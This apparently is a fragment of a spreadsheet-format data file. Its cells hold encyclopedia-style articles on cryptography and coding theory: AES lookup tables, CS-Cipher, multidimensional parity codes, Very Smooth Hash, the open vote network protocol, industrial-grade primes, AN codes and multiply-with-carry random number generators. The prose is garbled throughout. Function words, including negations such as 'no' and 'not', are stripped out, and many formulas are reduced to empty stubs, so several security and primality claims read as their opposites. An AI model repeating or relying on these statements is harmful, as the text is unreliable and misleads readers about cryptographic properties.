0x0c,0x01,0x16,0x1b,0x38,0x35,0x22,0x2f,0x64,0x69,0x7e,0x73,0x50,0x5d,0x4a,0x47, 0xdc,0xd1,0xc6,0xcb,0xe8,0xe5,0xf2,0xff,0xb4,0xb9,0xae,0xa3,0x80,0x8d,0x9a,0x97 multiply (0xe): 0x00,0x0e,0x1c,0x12,0x38,0x36,0x24,0x2a,0x70,0x7e,0x6c,0x62,0x48,0x46,0x54,0x5a, 0xe0,0xee,0xfc,0xf2,0xd8,0xd6,0xc4,0xca,0x90,0x9e,0x8c,0x82,0xa8,0xa6,0xb4,0xba, 0xdb,0xd5,0xc7,0xc9,0xe3,0xed,0xff,0xf1,0xab,0xa5,0xb7,0xb9,0x93,0x9d,0x8f,0x81, 0x3b,0x35,0x27,0x29,0x03,0x0d,0x1f,0x11,0x4b,0x45,0x57,0x59,0x73,0x7d,0x6f,0x61, 0xad,0xa3,0xb1,0xbf,0x95,0x9b,0x89,0x87,0xdd,0xd3,0xc1,0xcf,0xe5,0xeb,0xf9,0xf7, 0x4d,0x43,0x51,0x5f,0x75,0x7b,0x69,0x67,0x3d,0x33,0x21,0x2f,0x05,0x0b,0x19,0x17, 0x76,0x78,0x6a,0x64,0x4e,0x40,0x52,0x5c,0x06,0x08,0x1a,0x14,0x3e,0x30,0x22,0x2c, 0x96,0x98,0x8a,0x84,0xae,0xa0,0xb2,0xbc,0xe6,0xe8,0xfa,0xf4,0xde,0xd0,0xc2,0xcc, 0x41,0x4f,0x5d,0x53,0x79,0x77,0x65,0x6b,0x31,0x3f,0x2d,0x23,0x09,0x07,0x15,0x1b, 0xa1,0xaf,0xbd,0xb3,0x99,0x97,0x85,0x8b,0xd1,0xdf,0xcd,0xc3,0xe9,0xe7,0xf5,0xfb, 0x9a,0x94,0x86,0x88,0xa2,0xac,0xbe,0xb0,0xea,0xe4,0xf6,0xf8,0xd2,0xdc,0xce,0xc0, 0x7a,0x74,0x66,0x68,0x42,0x4c,0x5e,0x50,0x0a,0x04,0x16,0x18,0x32,0x3c,0x2e,0x20, 0xec,0xe2,0xf0,0xfe,0xd4,0xda,0xc8,0xc6,0x9c,0x92,0x80,0x8e,0xa4,0xaa,0xb8,0xb6, 0x0c,0x02,0x10,0x1e,0x34,0x3a,0x28,0x26,0x7c,0x72,0x60,0x6e,0x44,0x4a,0x58,0x56, 0x37,0x39,0x2b,0x25,0x0f,0x01,0x13,0x1d,0x47,0x49,0x5b,0x55,0x7f,0x71,0x63,0x6d, 0xd7,0xd9,0xcb,0xc5,0xef,0xe1,0xf3,0xfd,0xa7,0xa9,0xbb,0xb5,0x9f,0x91,0x83,0x8d references fips 197: official standard (pdf file) also advanced encryption standard</t>
  </si>
  <si>
    <t>CS-Cipher</t>
  </si>
  <si>
    <t>cryptography, cs-cipher (for chiffrement symétrique) block cipher invented jacques stern serge vaudenay 1998. submitted nessie project, selected. algorithm uses length bits (length must multiple bits). default, cipher uses bits. operates blocks bits using 8-round feistel network optimized 8-bit processors. round function based fast fourier transform uses binary expansion source "nothing sleeve numbers". references stern, vaudenay (1998). "cs-cipher" (postscript). retrieved 2007-02-15.</t>
  </si>
  <si>
    <t>Multidimensional parity-check code</t>
  </si>
  <si>
    <t>multidimensional parity-check code (mdpc) simple type error correcting code operates arranging message multidimensional grid, calculating parity digit column. general, n-dimensional parity scheme correct errors. example two-dimensional parity-check code, usually called optimal rectangular code, popular form multidimensional parity-check code. assume goal transmit four-digit message "1234", using two-dimensional parity scheme. first digits message arranged rectangular pattern: 34parity digits calculated summing column separately: 46the eight-digit sequence "12334746" message actually transmitted. single error occurs transmission error detected also corrected well. suppose received message contained error first digit. receiver rearranges message grid: 46the receiver first also first column incorrectly. using knowledge assumption error occurred, receiver correct error. order handle errors, 4-dimensional scheme would required, cost parity digits. decoder n-dimensional parity scheme guaranteed correct errors, minimum distance block codes, soft-decision decoder able correct this. also error detection correction forward error correction low-density parity-check code</t>
  </si>
  <si>
    <t>Very smooth hash</t>
  </si>
  <si>
    <t>cryptography, very smooth hash (vsh) provably secure cryptographic hash function invented 2005 scott contini, arjen lenstra steinfeld.provably secure means finding collisions difficult known hard mathematical problem. unlike provably secure collision-resistant hashes, efficient usable practice. asymptotically, requires single multiplication log(n) message-bits uses rsa-type arithmetic. therefore, useful embedded environments code space limited. major variants proposed. one, finding collision provably difficult finding nontrivial modular square root smooth number modulo uses prime modulus (with trapdoor), security proof relies hardness finding discrete logarithms smooth numbers modulo both versions similar efficiency. suitable substitute random oracle, used build provably secure randomized trapdoor hash function. this function replace trapdoor function used cramer–shoup signature scheme, maintaining provable security speeding verification time 50%. vssr cryptographic hash functions widely used based hard mathematical problems. those functions constructed hard mathematical problems called provably secure. finding collisions known hard solving hard mathematical problem. basic version very smooth hash function, hard problem find modular square roots (vssr) certain special numbers (vsn). this assumed hard factoring integers. fixed constant integer very smooth number (vsn) largest prime factor (log n)c. integer very smooth quadratic residue' modulo largest prime factorization (log exists integer {\displaystyle b\equiv x^{2}\mod integer said modular square root interested non-trivial square roots, root easily computed using algorithms fields characteristics real field. therefore, suitable cryptographic primitives. very smooth number nontrivial modular square root (vssr) following problem: product unknown primes approximately size {\displaystyle k\leq (\log n)^{c}} {\displaystyle p_{1}=2,p_{2}=3,p_{3}=5,\dots sequence primes. vssr following problem: given find {\displaystyle x\in \mathbb _{n}^{*}} {\displaystyle \textstyle x^{2}\equiv \prod _{i=0}^{k}p_{i}^{e_{i}}} least e0,...,ek odd. vssr assumption probabilistic polynomial {\displaystyle \log time algorithm solves vssr non-negligible probability. this considered useless assumption practice tell size moduli vssr computationally hard. instead computational vssr assumption used. says solving vssr assumed hard factoring hard-to-factor {\displaystyle modulus, {\displaystyle somewhat smaller size {\displaystyle examples vssr parameters fixed follows: {\displaystyle c=5} {\displaystyle n=31} then {\displaystyle m_{1}=35=5\cdot very smooth number respect parameters 7.37 {\displaystyle (\log 31)^{5}~{\dot {=}}~7.37} greater {\displaystyle m_{1}} prime factors. hand, {\displaystyle m_{2}=55=5\cdot {\displaystyle c=5} {\displaystyle n=31} integer {\displaystyle b_{1}=9} very smooth quadratic residue modulo {\displaystyle very smooth number (under {\displaystyle c,n} {\displaystyle x_{1}=3} {\displaystyle x_{1}^{2}=b_{1}} (mod {\displaystyle this trivial modular square root, {\displaystyle 3^{2}\not \geq modulus involved squaring. integer {\displaystyle b_{2}=15} also very smooth quadratic residue modulo {\displaystyle prime factors smaller 7.37 modular square root {\displaystyle x_{2}=20} since {\displaystyle 20^{2}=400\equiv (mod {\displaystyle this thus non-trivial root. vssr problem find {\displaystyle x_{2}} given {\displaystyle b_{2}} {\displaystyle suppose computationally hard factoring {\displaystyle algorithm, basic versions {\displaystyle large composite {\displaystyle p_{1}=2,p_{2}=3,\ldots sequence primes. {\displaystyle block length, largest integer {\displaystyle \textstyle \prod _{i=1}^{k}p_{i}&lt;n} {\displaystyle {\displaystyle \ell -bit message hashed consisting bits {\displaystyle (m_{1},\ldots ,m_{\ell assume {\displaystyle \ell &lt;2^{k}} compute hash {\displaystyle {\displaystyle smallest integer greater equal {\displaystyle l/k} number blocks. {\displaystyle m_{i}=0} {\displaystyle l&lt;i\leq (padding) {\displaystyle \textstyle \ell =\sum _{i=1}^{k}l_{i}2^{i-1}} {\displaystyle \ell _{i}\in \{0,1\}} binary representation message length {\displaystyle \ell define {\displaystyle m_{lk+i}=\ell _{i}} {\displaystyle 1\leq i\leq 1,..., succession compute {\displaystyle x_{j+1}=x_{j}^{2}\prod _{i=1}^{k}p_{i}^{m_{jk+i}}\mod return 1.the function step called compression function. properties message length need known advance. finding collision hard solving vssr. thus (strongly) collision-resistant, also implies second preimage resistance. proven preimage-resistant. compression function collision-resistant. nonetheless, hash function collision-resistant based vssr assumption. altered version vsh, called vsh*, uses collision-resistant compression function times quicker hashing short messages. since output length length secure modulus, seems quite suitable practice constructing "hash-then-sign" signatures arbitrarily long messages. however, signature must designed carefully ensure security. naive approach could easily broken (chosen-plaintext attack). efficiency: cost iteration less cost modular multiplications. basic version altogether requires single multiplication {\displaystyle \omega (\log n/\log \log message bits. variants several improvements, speedups efficient variants proposed. none changes underlying concept function. these improvements called: cubing (instead squaring). increased number small primes. precomputed products primes. fast vsh. fast increased block length. vsdl vsh-dl variant vsh-dl discrete logarithm variant trapdoor, security depends difficulty finding discrete logarithm modulo prime p.very smooth number discrete logarithm (vsdl) problem given smooth number, want find discrete logarithm modulo number similarly previous section, {\displaystyle p_{i}} denote {\displaystyle prime. furthermore {\displaystyle fixed constant {\displaystyle {\displaystyle primes {\displaystyle p=2q+1} {\displaystyle k\leq (\log p)^{c}} vsdl following problem: given {\displaystyle find integers {\displaystyle e_{1},...,e_{k}} {\displaystyle 2^{e_{1}}\equiv \prod _{i=2}^{k}p_{i}^{e_{i}}\mod {\displaystyle |e_{i}|&lt;q} {\displaystyle i=1,...,k} least {\displaystyle e_{1},...,e_{k}} non-zero. vsdl assumption probabilistic polynomial {\displaystyle \log time algorithm solves vsdl non-negligible probability. there strong connection hardness vsdl hardness computing discrete logarithm modulo {\displaystyle reminiscent somewhat weaker than, connection vssr integer factorization. security strong collision resistance property proven vsh. this imply preimage-resistance important hash function properties, authors state "vsh used model random oracles," cannot substituted constructions depend upon (rsa signatures, macs). considered general-purpose hash function usually understood security engineering. multiplicative property multiplicative: three strings equal length, consists zero bits strings satisfy easy h(z)h(x h(x)h(y) (mod result, succumbs classical time-memory trade-off attack applies multiplicative additive hashes. this fact used construct preimage attack {\displaystyle \ell bits {\displaystyle 2^{\ell /2}} complexity rather {\displaystyle 2^{\ell expected. attack truncated version produces long hash (typically 1024 bits). there indications truncated hash offers security commensurate hash length. there exists partial collision attack truncated least significant bits.the complexity attack pre-computing table offline: {\displaystyle 2^{\ell /3}} time space. finding collisions: {\displaystyle 2^{\ell /3}} iterations. total cost: roughly {\displaystyle 2^{\ell /3}} rather {\displaystyle 2^{\ell /2}} expected hash function good pseudorandomness properties.this probably rules applicability digital signature schemes produce signatures shorter hash result, elliptic-curve signature schemes. also cryptographic hash functions provably secure cryptographic hash function references</t>
  </si>
  <si>
    <t>Open vote network</t>
  </si>
  <si>
    <t>cryptography, open vote network ov-net) secure multi-party computation protocol compute boolean-count function: namely, given binary values input, compute total count ones without revealing individual value. this protocol proposed feng hao, peter ryan, piotr zieliński 2010. extends zieliński's anonymous veto network protocol allowing participant count number veto votes (i.e., input boolean-or function) preserving anonymity voted. protocol generalized support wider range inputs beyond binary values description participants agree group {\displaystyle \scriptstyle generator {\displaystyle \scriptstyle prime order {\displaystyle \scriptstyle discrete logarithm problem hard. example, schnorr group used. assume {\displaystyle \scriptstyle participants. unlike secure multi-party computation protocols typically require pairwise secret authenticated channels participants addition authenticated public channel, ov-net requires authenticated public channel available every participant. such channel realized using digital signatures. protocol runs rounds. round participant {\displaystyle \scriptstyle selects random value {\displaystyle \scriptstyle x_{i}\,\in _{r}\,\mathbb _{q}} publishes ephemeral public {\displaystyle \scriptstyle g^{x_{i}}} together zero-knowledge proof proof knowledge exponent {\displaystyle \scriptstyle x_{i}} such proofs realized using schnorr non-interactive zero-knowledge proofs described 8235. after round, participant computes: {\displaystyle g^{y_{i}}=\prod _{j&lt;i}g^{x_{j}}/\prod _{j&gt;i}g^{x_{j}}} round participant {\displaystyle \scriptstyle publishes {\displaystyle \scriptstyle g^{x_{i}y_{i}}g^{v_{i}}} {\displaystyle \scriptstyle v_{i}} either together 1-out-of-2 zero knowledge proof proof {\displaystyle \scriptstyle v_{i}} {\displaystyle \scriptstyle \{0,1\}} such 1-out-of-2 proofs realized using cramer, gennaro, schoenmakers' zero-knowledge proof technique.after round participant computes {\displaystyle \scriptstyle \prod _{i}g^{x_{i}y_{i}}g^{v_{i}}=g^{\sum _{i}v_{i}}} note {\displaystyle \scriptstyle x_{i}} values vanish {\displaystyle \scriptstyle \sum _{i}{x_{i}y_{i}}=0} exponent {\displaystyle \scriptstyle \sum _{i}v_{i}} represents count ones. usually small number, count computed exhaustive search. overall, 2-round efficiency theoretically best possible. terms computational load bandwidth usage, ov-net also efficient among related techniques. maximum secrecy ov-net protocol guarantees secrecy input unless input bits known. protection secrecy maximum since bits known, remaining always computed subtracting values known input bits output boolean-count function. applications straightforward application ov-net build boardroom voting system, election voters themselves. single candidate election, voter sends either "no" "yes", correspond every voter, well observer, tally "yes" votes without needing tallying authority. there standard methods extend single-candidate election support multiple candidates. straightforward method single-candidate election parallel multiple candidates, voter casts "yes/no" candidates. additional zero-knowledge proofs needed voter limited vote candidate. another method modify encoding candidates: instead using "no" "yes" single-candidate election, encode candidate unique number tally candidate unambiguously computed. case, general 1-out-of-n zero-knowledge proof used instead number candidates. implementation prototype implementation ov-net presented mccorry, shahandashti, financial cryptography'17 smart contract ethereum's blockchain. source code publicly available. this implementation forms part newcastle university team's solution "removing trusted tallying authorities: self-enforcing e-voting ethereum", awarded third place 2016 economist cybersecurity challenge jointly organized economist kaspersky lab. references</t>
  </si>
  <si>
    <t>Industrial-grade prime</t>
  </si>
  <si>
    <t>industrial-grade primes (the term apparently henri cohen) integers primality certified (i.e. rigorously proven), undergone probable prime tests miller–rabin primality test, positive, negligible, failure rate, baillie–psw primality test, composites known pass. industrial-grade primes sometimes used instead certified primes algorithms encryption, require user generate large prime numbers. certifying primality large numbers (over digits instance) significantly harder showing industrial-grade primes. latter done almost instantly failure rate highly unlikely ever fail practice. words, number believed prime high, absolute, confidence. references</t>
  </si>
  <si>
    <t>AN codes</t>
  </si>
  <si>
    <t>codes error-correcting code used arithmetic applications. arithmetic codes commonly used computer processors ensure accuracy arithmetic operations electronics unreliable. arithmetic codes help processor detect error made correct without codes, processors would unreliable since errors would undetected. codes arithmetic codes named integers {\displaystyle {\displaystyle used encode decode codewords. these codes differ codes arithmetic weight maximize arithmetic distance codewords opposed hamming weight hamming distance. arithmetic distance words measure number errors made computing arithmetic operation. using arithmetic distance necessary since error arithmetic operation cause large hamming distance received answer correct answer. arithmetic weight distance arithmetic weight integer {\displaystyle base {\displaystyle defined {\displaystyle w(x)=\min\{t|x=\sum _{i=1}^{t}a_{i}r^{n(i)}\}} {\displaystyle |{a_{i}}|} {\displaystyle {\displaystyle n(i)\geq {\displaystyle r,n(i)\in \mathbb arithmetic distance word upper bounded hamming weight since integer represented standard polynomial form {\displaystyle x=\sum _{i=1}^{n}b_{i}r^{i}} {\displaystyle b_{i}} digits integer. removing terms {\displaystyle b_{i}=0} simulate {\displaystyle equal hamming weight. arithmetic weight usually less hamming weight since {\displaystyle a_{i}} allowed negative. example, integer {\displaystyle x=29} 11101 {\displaystyle 11101} binary hamming weight {\displaystyle this quick upper bound arithmetic weight since {\displaystyle x=2^{0}+2^{2}+2^{3}+2^{4}} however, since {\displaystyle a_{i}} negative, write {\displaystyle x=2^{5}-2^{1}-2^{0}} makes arithmetic weight equal {\displaystyle arithmetic distance integers defined {\displaystyle d(x,y)=w(x-y)} this primary metrics used analyzing arithmetic codes. codes codes defined integers {\displaystyle {\displaystyle used encode integers {\displaystyle {\displaystyle b-1} {\displaystyle c=\{an|n\in \mathbb ,0\leq {\displaystyle b\}} each choice {\displaystyle result different code, {\displaystyle serves limiting factor ensure useful properties distance code. {\displaystyle large, could codeword small arithmetic weight code degrade distance entire code. utilize codes, arithmetic operation performed integers, integer multiplied {\displaystyle result operation codewords {\displaystyle note {\displaystyle must also {\displaystyle {\displaystyle b-1} proper decoding. decode, simply divide {\displaystyle r/a} {\displaystyle factor {\displaystyle least error occurred likely solution codeword least arithmetic distance {\displaystyle codes using hamming distance, codes correct {\displaystyle \lfloor {\frac {d-1}{2}}\rfloor errors {\displaystyle distance code. example, code {\displaystyle a=3} operation adding {\displaystyle {\displaystyle start encoding operands. this results operation {\displaystyle r=45+48=93} then, find solution divide {\displaystyle 93/3=31} long {\displaystyle {\displaystyle possible operation code. suppose error occurs binary representation operands 101101 101111 {\displaystyle 45=101101\rightarrow 101111} 110000 110001 {\displaystyle 48=110000\rightarrow 110001} 101111 110001 1100000 {\displaystyle r=101111+110001=1100000} notice since 1011101 {\displaystyle 93=1011101} hamming weight received word correct solution {\displaystyle {\displaystyle errors. compute arithmetic weight, take 1100000 1011101 {\displaystyle 1100000-1011101=11} represented {\displaystyle 11=2^{0}+2^{1}} {\displaystyle 11=2^{2}-2^{0}} either case, arithmetic distance {\displaystyle expected since number errors made. correct error, algorithm would used compute nearest codeword received word terms arithmetic distance. describe algorithms detail. ensure distance code small, define modular codes. modular code {\displaystyle subgroup {\displaystyle \mathbb /m\mathbb {\displaystyle m=ab} codes measured terms modular distance defined terms graph vertices elements {\displaystyle \mathbb /m\mathbb vertices {\displaystyle x{\pmod {m}}} {\displaystyle x'{\pmod {m}}} connected {\displaystyle x-x'\equiv c\cdot r^{j}{\pmod {m}}} {\displaystyle c,j\in \mathbb {\displaystyle {\displaystyle {\displaystyle {\displaystyle j\geq then modular distance words length shortest path nodes graph. modular weight word distance {\displaystyle equal {\displaystyle w_{m}(x)=min\{w(y)|y\in \mathbb ,y\equiv x{\pmod {m}}\}} practice, value {\displaystyle typically chosen {\displaystyle m=r^{n}-1} since computer arithmetic computed {\displaystyle \mod 2^{n}-1} additional loss data code going bounds since computer also bounds. choosing {\displaystyle m=r^{n}-1} also tends result codes larger distances codes. using modular weight {\displaystyle m=r^{n}-1} codes cyclic code. definition: cyclic code code {\displaystyle subgroup {\displaystyle [r^{n}-1]} {\displaystyle [r^{n}-1]=\{0,1,2,\dots ,r^{n}-1\}} cyclic code principal ideal ring {\displaystyle [r^{n}-1]} there integers {\displaystyle {\displaystyle {\displaystyle ab=r^{n}-1} {\displaystyle a,b} satisfy definition code. cyclic codes subset cyclic codes properties. mandelbaum-barrows codes mandelbaum-barrows codes type cyclic codes introduced mandelbaum barrows. these codes created choosing {\displaystyle prime number divide {\displaystyle {\displaystyle \mathbb /b\mathbb generated {\displaystyle {\displaystyle {\displaystyle m=r^{n}-1} {\displaystyle positive integer {\displaystyle r^{n}\equiv 1{\pmod {b}}} {\displaystyle a=(r^{n}-1)/b} example, choosing {\displaystyle r=2,b=5,n=4} {\displaystyle a=(r^{n}-1)/b=3} result mandelbaum-barrows code {\displaystyle c=\{3n|n\in \mathbb ,0\leq {\displaystyle 5\}} base {\displaystyle analyze distance mandelbaum-barrows codes, need following theorem. theorem: {\displaystyle c\subset [r^{n}-1]} cyclic code generator {\displaystyle {\displaystyle b=|c|=(r^{n}-1)/a} then, {\displaystyle \sum _{x\in c}w_{m}(x)=n(\lfloor {\frac {rb}{r+1}}\rfloor -\lfloor {\frac {b}{r+1}}\rfloor proof: assume {\displaystyle x\in unique cyclic representation {\displaystyle x\equiv \sum _{i=0}^{n-1}c_{i,x}r^{i}{\pmod {r^{n}-1}}} define {\displaystyle n\times matrix elements {\displaystyle c_{i,x}} {\displaystyle 0\leq i\leq n-1} {\displaystyle x\in this matrix essentially list codewords {\displaystyle column codeword. since {\displaystyle cyclic, column matrix number zeros. must calculate {\displaystyle n|\{x\in c|c_{n-1,x}\neq 0\}|} {\displaystyle times number codewords {\displaystyle property cyclic naf, {\displaystyle c_{n-1,x}\neq {\displaystyle y\in \mathbb {\displaystyle y\equiv x{\pmod {r^{n}-1}},{\frac {m}{r+1}}} {\displaystyle y\leq {\frac {mr}{r+1}}} since {\displaystyle x=an{\pmod {r^{n}-1}}} {\displaystyle 0\leq {\displaystyle {\displaystyle {\frac {b}{r+1}}} {\displaystyle n\leq {\frac {br}{r+1}}} then number integers zero last {\displaystyle \lfloor {\frac {rb}{r+1}}\rfloor -\lfloor {\frac {b}{r+1}}\rfloor multiplying {\displaystyle characters codewords gives weights codewords {\displaystyle n(\lfloor {\frac {rb}{r+1}}\rfloor -\lfloor {\frac {b}{r+1}}\rfloor desired. previous theorem show mandelbaum-barrows codes equidistant (which means every pair codewords distance), distance {\displaystyle {\frac {n}{b-1}}(\lfloor {\frac {rb}{r+1}}\rfloor -\lfloor {\frac {b}{r+1}}\rfloor proof: {\displaystyle x\in c,x\neq {\displaystyle x=an{\pmod {r^{n}-1}}} {\displaystyle divisible {\displaystyle this implies {\displaystyle \exists j(n\equiv r^{j}{\pmod {b}})} then {\displaystyle w_{m}(x)=w_{m}(\pm r^{j}a)=w_{m}(a)} this proves {\displaystyle equidistant since codewords weight {\displaystyle since codewords weight, previous theorem know total weight codewords, distance code found dividing total weight number codewords (excluding also error detection correction forward error correction references</t>
  </si>
  <si>
    <t>Multiply-with-carry pseudorandom number generator</t>
  </si>
  <si>
    <t>computer science, multiply-with-carry (mwc) method invented george marsaglia generating sequences random integers based initial many thousands randomly chosen seed values. main advantages method invokes simple computer integer arithmetic leads fast generation sequences random numbers immense periods, ranging around {\displaystyle 2^{60}} 2000000 {\displaystyle 2^{2000000}} pseudorandom number generators, resulting sequences functions supplied seed values. general theory generator special form lehmer random number generator {\displaystyle x_{n}=bx_{n-1}{\bmod {p}}} allows efficient implementation prime modulus {\displaystyle much larger machine word size. normal lehmer generator implementations choose modulus close machine word size. generator instead maintains state base {\displaystyle multiplying {\displaystyle done implicitly shifting word. base {\displaystyle typically chosen equal computer's word size, makes arithmetic modulo {\displaystyle trivial. this vary {\displaystyle b=2^{8}} microcontroller {\displaystyle b=2^{64}} (this article uses {\displaystyle b=2^{32}} examples.) initial state ("seed") values arbitrary, except must zero, maximum permitted values {\displaystyle x_{0}=b-1} {\displaystyle c_{0}=a-1} (this commonly done choosing {\displaystyle c_{0}} {\displaystyle a-2} sequence sequence pairs {\displaystyle x_{n},c_{n}} determined {\displaystyle x_{n}=(ax_{n-1}+c_{n-1})\,{\bmod {\,}}b,\ c_{n}=\left\lfloor {\frac {ax_{n-1}+c_{n-1}}{b}}\right\rfloor this called lag-1 sequence. sometimes base preferred, case {\displaystyle b=2^{k}-1} used, almost simple implement. lag- {\displaystyle sequence generalization lag-1 sequence allowing longer periods. lag- {\displaystyle sequence sequence pairs {\displaystyle x_{n},c_{n}} (for {\displaystyle n&gt;r} determined {\displaystyle x_{n}=(ax_{n-r}+c_{n-1})\,{\bmod {\,}}b,\ c_{n}=\left\lfloor {\frac {ax_{n-r}+c_{n-1}}{b}}\right\rfloor generator output sequence {\displaystyle {\displaystyle x_{r},x_{r+1},x_{r+2},...} case, initial state ("seed") values must zero {\displaystyle x_{0}=b-1} {\displaystyle c_{r-1}=a-1} multiplier {\displaystyle {\displaystyle determine modulus {\displaystyle p=ab^{r}-1} practice, {\displaystyle chosen modulus prime sequence long period. modulus prime, period lag- {\displaystyle generator order {\displaystyle multiplicative group numbers modulo {\displaystyle while theoretically possible choose non-prime modulus, prime modulus eliminates possibility initial seed sharing common divisor modulus, would reduce generator's period. because quadratic residue numbers form {\displaystyle 8k\pm {\displaystyle b=2^{k}} cannot primitive root {\displaystyle p=ab^{r}-1} therefore, generators base {\displaystyle 2^{k}} parameters chosen period (abr−1)/2. this difficulties overcomes. basic form generator parameters words state. state consists residues modulo x2,..., xr−1 b,and carry cr−1 although theory generators permits almost always chosen smaller convenience implementation. state transformation function generator step montgomery reduction modulo state large integer significant word cn−1 least significant word xn−r. each step, xn−r·(abr−1) added integer. this done parts: −1·xn−r added xn−r, resulting least significant word zero. second, a·xn−r added carry. this makes integer word longer, producing significant words far, simply added multiple state, resulting different representative residue class modulo finally, state shifted word, dividing this discards least significant word zero (which, practice, never computed all) effectively multiplies state (mod thus, multiply-with-carry generator lehmer generator modulus multiplier (mod this generator multiplier producing output reverse order, affect quality resultant pseudorandom numbers. couture l'ecuyer proved surprising result lattice associated multiply-with-carry generator close lattice associated lehmer generator simulates. thus, mathematical techniques developed lehmer generators (such spectral test) applied multiply-with-carry generators. efficiency linear congruential generator base implemented {\displaystyle x_{n+1}=(ax_{n}+c)\ {\bmod {\,}}2^{32},} constant. (mod odd, resulting base-232 congruential sequence period 232.this computed using bits product current however, many microprocessors compute full 64-bit product almost time bits. indeed, many compute 64-bit product ignore high half. lag-1 multiply-with-carry generator allows make period nearly using almost computer operations, except half 64-bit product ignored product computed. instead, 64-bit computed, half used carry value rather fixed additive constant standard congruential sequence: compute ax+c bits, half bottom half choice multiplier with multiplier specified, pair input values converted pair, {\displaystyle x\leftarrow (ax+c)\,{\bmod {\,}}2^{32},\ c\leftarrow \left\lfloor {\frac {ax+c}{2^{32}}}\right\rfloor zero, period resulting multiply-with-carry sequence order multiplicative group residues modulo smallest (mod prime, fermat's little theorem guarantees order element must divide ensure large order choose "safe prime", 1)/2 abr/2 prime. case, period abr/2 approaching 263, practice acceptably large subset number possible 32-bit pairs more specifically, case, order element divides four possible divisors: abr/2 first apply elements quadratic reciprocity arguments show fourth option cannot apply third option remains. following maximal values computer applications satisfy safe prime condition, lag-1 generators: while safe prime ensures almost element group large order, period generator specifically order small moduli, computationally expensive methods used find multipliers period ab/2 following maximum values various sizes. generators repeating decimals output multiply-with-carry generator equivalent radix-b expansion fraction denominator here example simple case result repeating decimal. starting {\textstyle c_{0}=1,x_{0}=0} sequence {\displaystyle x_{n}=(7x_{n-1}+c_{n-1})\,{\bmod {\,}}10,\ c_{n}=\left\lfloor {\frac {7x_{n-1}+c_{n-1}}{10}}\right\rfloor produces sequence states: 10,01,07,49,67,55,40,04,28,58,61,13,22,16,43,25,37,52,19,64,34,31, 10,01,07,...with period consider sequence 0,1,7,9,7,5,0,4,8,8,1,3,2,6,3,5,7,2,9,4,4,1, 0,1,7,9,7,5,0,...notice repeated segments values reverse order: 1449275 9710 1449275 9710 {\displaystyle 1449275\cdots 9710\,1449275\cdots 9710\,144\cdots expansion j/(ab−1) a=7, b=10, j=10: 0.1449275362318840579710 14492753623 {\displaystyle {\frac {10}{69}}=0.1449275362318840579710\,14492753623\ldots this true general: sequence produced lag-r generator: {\displaystyle x_{n}=(ax_{n-r}+c_{n-1}){\bmod {\,}}b\,,\ c_{n}=\left\lfloor {\frac {ax_{n-r}+c_{n-1}}{b}}\right\rfloor reverse order, radix-b expansion fraction j/(abr abr. equivalence linear congruential generator continuing example, start {\textstyle x_{0}=34} generate ordinary congruential sequence {\displaystyle x_{n}=7x_{n-1}\,{\bmod {\,}}69} period sequence 31,10,1,7,49,67,55,40,4,28,58,61,13,22,16,43,25,37,52,19,64,34, 31,10,1,7,...and sequence, reduced 1,0,1,7,9,7,5,0,4,8,8,1,3,2,6,3,5,7,2,9,4,4, 1,0,1,7,9,7,5,0,...the sequence resulting sequence. this true general, (but apparently lag-1 sequences): given initial values {\displaystyle x_{0},c_{0}} sequence {\displaystyle x_{1},x_{2},\ldots resulting lag-1 sequence {\displaystyle x_{n}=(ax_{n-1}+c_{n-1})\,{\bmod {b}}\,,\ c_{n}=\left\lfloor {\frac {ax_{n-1}+c_{n-1}}{b}}\right\rfloor exactly lehmer random number generator output sequence reduced modulo choosing different initial value merely rotates cycle x's. complementary-multiply-with-carry generators establishing period lag-r generator usually entails choosing multiplier prime. then factored order find order safe prime, simple, order either 1)/2. cases, difficult factor. however, algorithm also permits negative multiplier. this leads slight modification procedure, produces modulus |−abr this makes easy factor, making practical establish period large generators. modified procedure called complementary-multiply-with-carry (cmwc), setup lag-r mwc: multiplier base seeds, ..., xr−1, cr−1.the modification generation pair rearranging computation avoid negative numbers, value complemented subtracting {\displaystyle x_{n}=(b-1)-(ax_{n-r}+c_{n-1})\,{\bmod {\,}}b,\ c_{n}=\left\lfloor {\frac {ax_{n-r}+c_{n-1}}{b}}\right\rfloor resulting sequence produced cmwc period order multiplicative group residues modulo abr+1, output x's, reverse order, form base expansion j/(abr+1) abr. lag-r cmwc makes much easier find periods large 512, 1024, 2048, etc. (making power makes slightly simpler access elements array containing recent x's.) another advantage modified procedure period multiple output exactly equidistributed (the ordinary mwc, full period, produces possible output equal number times except zero produced time less, bias negligible period long enough.) disadvantage cmwc construction that, power-of-two base, maximum achievable period less similar-sized generator; lose several bits. thus, generator usually preferable small lags. this remedied using 2k−1, choosing word longer compensate. some examples: with 232, 109111 108798 108517, period lag-1024 cmwc 1024 1024 {\displaystyle x_{n}=(b-1)-(ax_{n-1024}+c_{n-1})\,{\bmod {\,}}b,\ c_{n}=\left\lfloor {\frac {ax_{n-1024}+c_{n-1}}{b}}\right\rfloor a·232762 ab1024/64, 109867. with 3636507990, ab1359 safe prime, sequence based period 3636507990·243487 1013101. with 232, cmwc near record period based prime 15455296b42658 order prime 241489·21365056 10410928. more general moduli modulus abr−1 chosen make computation particularly simple, brings disadvantages, notably period half modulus. there several ways generalize this, cost multiplications iteration. first, possible additional terms product, producing modulus form arbr+asbs−1. this requires computing arxn−r asxn−s. (the carry limited word however, period issue, depends bits modulus. fortunately, montgomery reduction algorithm permits moduli, long relatively prime base applied permit modulus form arbr−a0, wide range values goresky klapper developed theory generalized multiply-with-carry generators, proving, particular, choosing negative ar–a0 carry value always smaller making implementation efficient. general form modulus improves also quality generator, albeit cannot always full period. implement goresky-klapper generator precomputes a−10 (mod changes iteration follows: {\displaystyle t=c_{n-1}+\sum _{1}^{r}a_{i}x_{n-i},\ x_{n}=a_{0}^{-1}t{\bmod {b}},\ c_{n}=\left\lfloor {\frac {t-a_{0}x_{n}}{b}}\right\rfloor common case must inverse exist. implementation following implementation cmwc algorithm programming language. also, included program sample initialization function. implementation base 232−1 r=4096. period resulting generator 131104 {\displaystyle 2^{131104}} following implementations small-state generators 64-bit output using 128-bit multiplications. following implementations small-state goresky-klapper's generalized generators 64-bit output using 128-bit multiplications. usage because simplicity speed, cmwc known used game development, particularly modern roguelike games. informally known mother prngs, name originally coined marsaglia himself. libtcod, cmwc4096 replaced mt19937 default prng. also mersenne twister list random number generators references marsaglia, george july 2003). "xorshift rngs". journal statistical software. (14): 1–6. doi:10.18637/jss.v008.i14. marsaglia, george (october 2005). randomness decimal expansions". interstat. citeseerx 10.1.1.694.4783. press, 